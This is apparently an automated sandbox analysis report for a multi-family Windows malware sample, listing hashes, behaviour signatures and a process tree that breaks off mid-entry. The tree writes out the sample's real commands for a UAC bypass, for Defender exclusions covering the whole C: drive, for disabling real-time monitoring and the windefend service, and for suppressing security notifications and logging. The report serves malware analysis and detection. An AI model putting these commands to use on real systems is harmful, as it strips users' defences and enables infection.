Analysis

  • max time kernel
    150s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26/03/2025, 16:42

General

  • Target

    2025-03-26_bac9ac1ac04e6924c24c39be9ffff843_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe

  • Size

    15.7MB

  • MD5

    bac9ac1ac04e6924c24c39be9ffff843

  • SHA1

    8fa5b362a62214dcf8ffd638e203c4d80d3d69af

  • SHA256

    e16d6d00f16967e549e742e67b355d725641269b6cd6fd6a6e687046ab220e75

  • SHA512

    036f144e7d364d00361353aea19fe1c6504b0ea89ce7db3c363b78a88cd756e5bca91b2d27583aff2ff019d9817016deed4d214317e55e9697890db60d81f679

  • SSDEEP

    196608:5AdCNbhcF1WKW6whfOjGvAWHMMH1OAY8PyedZLOOW7j7XlivZqOXmtubmxl5pprz:5AdghcflGvF0t7iZqptmmH5Hn

Malware Config

Signatures

  • Contains code to disable Windows Defender 3 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Disables service(s) 3 TTPs
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 28 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 16 IoCs
  • Modifies security service 2 TTPs 4 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • XMRig Miner payload 3 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 32 IoCs

    Using powershell.exe command.

  • Disables Task Manager via registry modification
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs
  • Modifies Windows Firewall 2 TTPs 18 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets service image path in registry 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 2 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Modifies Security services 2 TTPs 20 IoCs

    Modifies the startup behavior of a security service.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 16 IoCs
  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 12 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 11 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 12 IoCs
  • Kills process with WMI 11 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 11 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-26_bac9ac1ac04e6924c24c39be9ffff843_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-26_bac9ac1ac04e6924c24c39be9ffff843_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2396
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\Start.cmd" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2084
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Start.cmd"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2316
        • C:\Windows\SysWOW64\wscript.exe
          C:\Windows\System32\WScript.exe "C:\Users\Public\testvb1.vbs"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2740
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Public\ & copy /v /b /y C:\Users\Public\testvb1.vbs C:\Users\Public\testvb2.vbs
            5⤵
              PID:3012
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\Start.cmd"
            4⤵
              PID:2744
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Start2.cmd' -windowstyle hidden"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2904
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\Start2.cmd" "
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2952
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\Start2.cmd"
                  6⤵
                    PID:2708
                  • C:\Windows\SysWOW64\reg.exe
                    C:\Windows\System32\reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:1724
                  • C:\Windows\SysWOW64\find.exe
                    C:\Windows\System32\find.exe "0x0"
                    6⤵
                      PID:2600
                    • C:\Windows\SysWOW64\reg.exe
                      C:\Windows\System32\reg.exe query "HKCU\Software\Microsoft\Windows"
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:2608
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\uac.cmd' -windowstyle hidden"
                      6⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2660
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\uac.cmd" "
                        7⤵
                        • Suspicious use of WriteProcessMemory
                        PID:672
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" -Command "Start-Process cmd -ArgumentList '/c "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" Set-Itemproperty -Path REGISTRY::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0' -Verb RunAs -Wait -windowstyle hidden"
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:772
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-Itemproperty -Path REGISTRY::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
                            9⤵
                              PID:2028
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-Itemproperty -Path REGISTRY::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
                                10⤵
                                • UAC bypass
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1208
                      • C:\Windows\SysWOW64\PING.EXE
                        C:\Windows\System32\ping.exe 192.168.1.1 -n 3
                        6⤵
                        • System Location Discovery: System Language Discovery
                        • System Network Configuration Discovery: Internet Connection Discovery
                        • Runs ping.exe
                        PID:1636
                      • C:\Windows\SysWOW64\reg.exe
                        C:\Windows\System32\reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"
                        6⤵
                          PID:2972
                        • C:\Windows\SysWOW64\find.exe
                          C:\Windows\System32\find.exe "0x0"
                          6⤵
                            PID:2684
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "& {Get-Content -Path "'C:\Users\Admin\AppData\Local\Temp\NhStart3.cmd'" | Out-File -FilePath "'C:\Users\Admin\AppData\Local\Temp\Start3.cmd'" -Encoding ascii}" -Wait
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2924
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Start3.cmd' -verb runas -windowstyle hidden"
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2416
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Start3.cmd"
                              7⤵
                              • Drops file in System32 directory
                              • System Location Discovery: System Language Discovery
                              PID:2348
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\stwinvr.cmd' -verb runas -windowstyle hidden"
                                8⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:848
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\stwinvr.cmd"
                                  9⤵
                                    PID:1532
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-MpPreference -ExclusionExtension bat
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2240
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command Set-MpPreference -MAPSReporting Disable
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2516
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1588
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -PUAProtection disable
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2780
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -ScanScheduleDay "8"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2884
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -HighThreatDefaultAction "9"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2628
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -ModerateThreatDefaultAction "9"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1944
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -LowThreatDefaultAction "9"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1696
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -command Set-MpPreference -SevereThreatDefaultAction "9"
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2984
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:964
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1340
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1992
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\SysWOW64\en"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1916
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Public"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1556
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\L2cache"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2876
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2480
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Tfile"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2872
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Tweaker"
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1504
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-MpPreference -ExclusionExtension cmd
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1236
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe Set-MpPreference -ExclusionExtension exe
                                  8⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2236
                                • C:\Windows\SysWOW64\net.exe
                                  C:\Windows\System32\NET.exe stop windefend
                                  8⤵
                                    PID:652
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop windefend
                                      9⤵
                                        PID:2192
                                    • C:\Windows\SysWOW64\sc.exe
                                      C:\Windows\System32\SC.exe config windefend start=disabled
                                      8⤵
                                      • Launches sc.exe
                                      PID:2976
                                    • C:\Windows\SysWOW64\reg.exe
                                      C:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f /reg:64
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1232
                                    • C:\Windows\SysWOW64\reg.exe
                                      C:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                      8⤵
                                        PID:2488
                                      • C:\Windows\SysWOW64\reg.exe
                                        C:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v TeamViewer /f
                                        8⤵
                                          PID:2892
                                        • C:\Windows\SysWOW64\reg.exe
                                          C:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v TeamViewer /f
                                          8⤵
                                            PID:1388
                                          • C:\Windows\SysWOW64\reg.exe
                                            C:\Windows\System32\reg.exe delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f
                                            8⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:676
                                          • C:\Windows\SysWOW64\reg.exe
                                            C:\Windows\System32\reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /f
                                            8⤵
                                              PID:1336
                                            • C:\Windows\SysWOW64\reg.exe
                                              C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d "0" /f
                                              8⤵
                                                PID:960
                                              • C:\Windows\SysWOW64\reg.exe
                                                C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d "1" /f /reg:64
                                                8⤵
                                                  PID:1928
                                                • C:\Windows\SysWOW64\reg.exe
                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Windows" /v NoInteractiveServices /t REG_DWORD /d "1" /f
                                                  8⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:848
                                                • C:\Windows\SysWOW64\reg.exe
                                                  C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d "1" /f
                                                  8⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:628
                                                • C:\Windows\SysWOW64\reg.exe
                                                  C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "DontShowUI" /t REG_DWORD /d "1" /f
                                                  8⤵
                                                    PID:1936
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f /reg:64
                                                    8⤵
                                                      PID:2180
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                      8⤵
                                                        PID:2436
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f /reg:64
                                                        8⤵
                                                          PID:2864
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                          8⤵
                                                            PID:1796
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            C:\Windows\System32\reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f /reg:64
                                                            8⤵
                                                              PID:1500
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              C:\Windows\System32\reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                              8⤵
                                                                PID:692
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f /reg:64
                                                                8⤵
                                                                  PID:1396
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
                                                                  8⤵
                                                                    PID:1340
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d "00000001" /f /reg:64
                                                                    8⤵
                                                                      PID:3048
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "00000001" /f /reg:64
                                                                      8⤵
                                                                      • Modifies Windows Defender notification settings
                                                                      PID:3068
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_SZ /f /reg:64
                                                                      8⤵
                                                                      • Modifies Windows Defender notification settings
                                                                      PID:1728
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "00000001" /f
                                                                      8⤵
                                                                      • Modifies Windows Defender notification settings
                                                                      PID:2328
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_SZ /f
                                                                      8⤵
                                                                      • Modifies Windows Defender notification settings
                                                                      PID:1672
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f /reg:64
                                                                      8⤵
                                                                      • Modifies Windows Defender notification settings
                                                                      PID:1132
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f /reg:64
                                                                      8⤵
                                                                      • Modifies Windows Defender notification settings
                                                                      PID:2156
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f
                                                                      8⤵
                                                                      • Modifies Windows Defender notification settings
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1044
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "00000001" /f
                                                                      8⤵
                                                                      • Modifies Windows Defender notification settings
                                                                      PID:892
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f /reg:64
                                                                      8⤵
                                                                        PID:1000
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                        8⤵
                                                                          PID:912
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f /reg:64
                                                                          8⤵
                                                                            PID:1628
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                            8⤵
                                                                              PID:264
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f /reg:64
                                                                              8⤵
                                                                                PID:2528
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                8⤵
                                                                                  PID:1980
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "NoActionNotificationDisabled" /t REG_DWORD /d "00000001" /f /reg:64
                                                                                  8⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:1624
                                                                                • C:\Windows\SysWOW64\reg.exe
